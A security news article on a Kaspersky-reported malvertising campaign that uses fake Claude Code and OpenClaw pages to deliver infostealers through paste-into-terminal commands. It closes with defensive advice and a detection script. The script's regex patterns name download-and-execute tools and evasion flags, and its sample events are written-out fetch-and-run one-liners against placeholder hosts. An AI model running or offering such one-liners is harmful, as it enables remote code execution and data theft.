Kaspersky Warns of Malvertising Campaign Disguising Malware as AI Coding Tools
Campaign Overview
Kaspersky’s research reveals a coordinated malvertising effort aimed at people searching for AI‑assisted coding tools. Queries such as “Claude Code download” and “OpenClaw download” surface sponsored results at the top of the page that look legitimate. Clicking them redirects the user to sites that closely mimic the official pages of Anthropic’s Claude Code and the open‑source OpenClaw agent.
The counterfeit sites do not offer a traditional installer. Instead they present a command‑line snippet and instruct the visitor to paste it into the Windows Command Prompt or the macOS Terminal, the same ClickFix‑style delivery seen in earlier campaigns. Because the victim runs the command themselves, no installer file passes through the browser, so the download warnings and the operating‑system checks that normally apply to downloaded executables are never triggered, and the activity is harder to notice.
Malware Payloads
Depending on the operating system, the pasted command installs a different infostealer. Windows victims receive Amatera, a malware family that harvests files from user directories, browser data, and cryptocurrency wallets. Amatera has been seen in earlier campaigns that used ClickFix distribution and is sold under a Malware‑as‑a‑Service (MaaS) model.
macOS users are infected with AMOS (Atomic macOS Stealer), a long‑established macOS infostealer used in numerous attacks on Apple users. Both families are built to exfiltrate sensitive data without the victim noticing.
Risks for Developers
Kaspersky’s cybersecurity expert Vladimir Gursky emphasizes that the campaign is especially dangerous because AI development tools like Claude Code and OpenClaw are widely adopted by hobbyists, automation enthusiasts, and professional developers in large organizations. "If infected, victims may unknowingly expose source code from active projects, confidential corporate data, authentication credentials, and private accounts," Gursky notes.
The theft of source code and credentials can lead to intellectual property loss, unauthorized access to corporate systems, and financial theft from compromised cryptocurrency wallets. Organizations that rely on AI‑assisted coding tools are therefore at heightened risk.
Protective Measures
Security professionals advise developers to verify where a tool comes from before running anything: use the install path given in the vendor’s own documentation or official repository rather than a link from a search ad, check digital signatures or published checksums where the vendor provides them, and never paste a command from a web page into a terminal without reading what it does. Enterprises should brief their development teams on this campaign and monitor for terminals spawning download‑and‑execute one‑liners as well as for unusual outbound data transfers.
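The paste‑into‑terminal delivery described above and the monitoring recommended here both come down to the same pattern: a shell process whose command line fetches something from the network and executes it in the same step. The script below is an added example, not Kaspersky’s detection logic and not the commands used in this campaign; the sample command lines, the `.invalid` hostnames and the corporate allowlist are all constructed placeholders. It flags download‑and‑execute one‑liners, raises severity when the command also hides its window, bypasses execution policy or strips the macOS quarantine attribute, and lowers it when every URL host is on an organisation‑maintained allowlist of vendor install sources.

```python
"""Triage process-creation events for ClickFix-style paste-to-terminal one-liners.

Added example for this article; it is not Kaspersky's detection logic and the
command lines below are constructed to show the generic download-and-execute
pattern, not real indicators from the campaign. Hostnames ending in .invalid
and the corporate allowlist are placeholders.
"""
import re
from dataclasses import dataclass

# Tools that pull content from the network inside a single command.
FETCHERS = re.compile(
    r"\b(curl|wget|Invoke-WebRequest|iwr|Invoke-RestMethod|irm|"
    r"certutil(\.exe)?\s+-urlcache|bitsadmin|Start-BitsTransfer)\b",
    re.IGNORECASE,
)
# Ways of running what was just fetched without writing a file the user inspects.
EXECUTORS = re.compile(
    r"(\|\s*(sudo\s+)?(ba|z|)sh\b|\|\s*python3?\b|\biex\b|Invoke-Expression|"
    r"\bmshta\b|-enc(odedcommand)?\s+[A-Za-z0-9+/=]{20,})",
    re.IGNORECASE,
)
# Flags that hide the window, skip policy checks or strip macOS quarantine.
EVASION = re.compile(
    r"(-w(indowstyle)?\s+hidden|-nop\b|-noprofile\b|-ep\s+bypass|"
    r"-ExecutionPolicy\s+Bypass|xattr\s+-d\s+com\.apple\.quarantine)",
    re.IGNORECASE,
)
URL_HOST = re.compile(r"https?://([^/\s\"')]+)", re.IGNORECASE)


@dataclass
class Event:
    process: str   # image that ran the command (powershell.exe, bash, zsh, ...)
    parent: str    # what launched it (terminal host, browser, ...)
    cmdline: str


def classify(ev: Event, allowed_hosts: frozenset = frozenset()) -> tuple:
    """Return (severity, reasons). Severity is one of none/low/medium/high."""
    reasons = []
    fetch = FETCHERS.search(ev.cmdline) is not None
    execute = EXECUTORS.search(ev.cmdline) is not None
    if not (fetch and execute):
        return "none", reasons
    reasons.append("download-and-execute in one command")
    hosts = {h.lower() for h in URL_HOST.findall(ev.cmdline)}
    untrusted = sorted(h for h in hosts if h not in allowed_hosts)
    evasion = EVASION.search(ev.cmdline)
    if evasion:
        reasons.append(f"evasion flag: {evasion.group(0)}")
        return "high", reasons
    if hosts and not untrusted:
        reasons.append("all hosts on the vendor allowlist")
        return "low", reasons
    reasons.append(f"untrusted or missing host: {untrusted or ['<none>']}")
    return "medium", reasons


def triage(events, allowed_hosts=frozenset()):
    """Return [(severity, process, reasons)] for every event scoring above 'none'."""
    out = []
    for ev in events:
        sev, why = classify(ev, allowed_hosts)
        if sev != "none":
            out.append((sev, ev.process, why))
    return out


# Organisation-specific allowlist of hosts from which install scripts are
# legitimately fetched (placeholder; populate from vendor documentation).
ALLOWED_HOSTS = frozenset({"installer.corp.example"})

# Constructed sample events; none is a real indicator from the campaign.
SAMPLE_EVENTS = [
    Event("powershell.exe", "WindowsTerminal.exe",
          'powershell.exe -nop -w hidden -c "iex (irm https://cdn.example.invalid/setup.ps1)"'),
    Event("bash", "Terminal",
          'bash -c "curl -fsSL https://get.example.invalid/install.sh | sh"'),
    Event("zsh", "Terminal",
          'zsh -c "curl -s https://dl.example.invalid/a.sh | bash && xattr -d com.apple.quarantine ~/a"'),
    Event("bash", "Terminal",
          'bash -c "curl -fsSL https://installer.corp.example/tool.sh | bash"'),
    Event("git", "Terminal", "git clone https://github.com/example/repo.git"),
]

if __name__ == "__main__":
    for sev, proc, why in triage(SAMPLE_EVENTS, ALLOWED_HOSTS):
        print(f"{sev:6} {proc:15} {'; '.join(why)}")
```

Many legitimate tools are also installed with a `curl ... | sh` one‑liner, so the "medium" result is a triage queue, not a verdict; the allowlist is what separates a documented vendor install from an ad‑delivered look‑alike, and it has to be maintained from the vendor’s own documentation rather than from whatever domain the ad pointed at.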
By staying vigilant and adhering to best practices, developers can mitigate the risk posed by this sophisticated malvertising campaign.